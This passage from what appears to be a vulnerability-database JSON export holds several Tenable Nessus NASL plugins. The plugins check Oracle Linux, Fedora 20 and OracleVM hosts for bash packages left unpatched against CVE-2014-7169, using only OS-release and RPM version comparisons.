get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"bash-3.2-33.el5.1.0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:11:09", "description": "Swapping Florian's unofficial patches for those released by bash upstream.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-06T00:00:00", "type": "nessus", "title": "Fedora 20 : bash-4.2.51-2.fc20 (2014-12202)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bash", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-12202.NASL", "href": "https://www.tenable.com/plugins/nessus/78058", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-12202.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78058);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"FEDORA\", value:\"2014-12202\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Fedora 20 : bash-4.2.51-2.fc20 (2014-12202)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Swapping Florian's unofficial patches for those released by bash\nupstream.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-October/139900.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1c47a82e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"bash-4.2.51-2.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:09:28", "description": "Description of changes:\n\n[4.1.2-15.1.0.1]\n- Preliminary fix for CVE-2014-7169", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : bash (ELSA-2014-3075)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "p-cpe:/a:oracle:linux:bash-doc", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2014-3075.NASL", "href": "https://www.tenable.com/plugins/nessus/77891", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3075.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77891);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Oracle Linux 6 : bash (ELSA-2014-3075)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Description of changes:\n\n[4.1.2-15.1.0.1]\n- Preliminary fix for CVE-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004480.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"bash-4.1.2-15.el6_5.1.0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bash-doc-4.1.2-15.el6_5.1.0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-doc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:09:28", "description": "Description of changes:\n\n[3.0-27.0.2]\n- Preliminary fix for CVE-2014-7169", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Oracle Linux 4 : bash (ELSA-2014-3078)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "cpe:/o:oracle:linux:4"], "id": "ORACLELINUX_ELSA-2014-3078.NASL", "href": "https://www.tenable.com/plugins/nessus/77894", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3078.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77894);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Oracle Linux 4 : bash (ELSA-2014-3078)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Description of changes:\n\n[3.0-27.0.2]\n- Preliminary fix for CVE-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004482.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"bash-3.0-27.0.2.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:09:28", "description": "Description of changes:\n\n[4.2.45-5.2.0.1]\n- Preliminary fix for CVE-2014-7169", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : bash (ELSA-2014-3076)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "p-cpe:/a:oracle:linux:bash-doc", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2014-3076.NASL", "href": "https://www.tenable.com/plugins/nessus/77892", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3076.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77892);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Oracle Linux 7 : bash (ELSA-2014-3076)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Description of changes:\n\n[4.2.45-5.2.0.1]\n- Preliminary fix for CVE-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004479.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bash-4.2.45-5.el7_0.2.0.1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bash-doc-4.2.45-5.el7_0.2.0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-doc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:10:37", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - CVE-2014-7169 - bypass patch bug Related: #1146321\n\n - CVE-2014-7169 - proper 3.2 backport - courtesy of Florian Weimer Related: #1146321\n\n - (CVE-2014-7169) Resolves: #1146321", "cvss3": {"score": null, "vector": null}, "published": "2014-10-10T00:00:00", "type": "nessus", "title": "OracleVM 2.2 : bash (OVMSA-2014-0024)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:bash", "cpe:/o:oracle:vm_server:2.2"], "id": "ORACLEVM_OVMSA-2014-0024.NASL", "href": "https://www.tenable.com/plugins/nessus/78239", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2014-0024.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78239);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"OracleVM 2.2 : bash (OVMSA-2014-0024)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote OracleVM host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - CVE-2014-7169 - bypass patch bug Related: #1146321\n\n - CVE-2014-7169 - proper 3.2 backport - courtesy of\n Florian Weimer Related: #1146321\n\n - (CVE-2014-7169) Resolves: #1146321\");\n # https://oss.oracle.com/pipermail/oraclevm-errata/2014-September/000224.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4f04c161\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:2.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"2\\.2\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 2.2\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS2.2\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:09:54", "description": "Description of changes:\n\n[3.0-27.0.3]\n- Rework env function definition for safety (Florian Weimer) [CVE-2014-7169]", "cvss3": {"score": null, "vector": null}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Oracle Linux 4 : bash (ELSA-2014-3079)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "cpe:/o:oracle:linux:4"], "id": "ORACLELINUX_ELSA-2014-3079.NASL", "href": "https://www.tenable.com/plugins/nessus/77953", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3079.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77953);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Oracle Linux 4 : bash (ELSA-2014-3079)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Description of changes:\n\n[3.0-27.0.3]\n- Rework env function definition for safety (Florian Weimer) [CVE-2014-7169]\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004493.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", 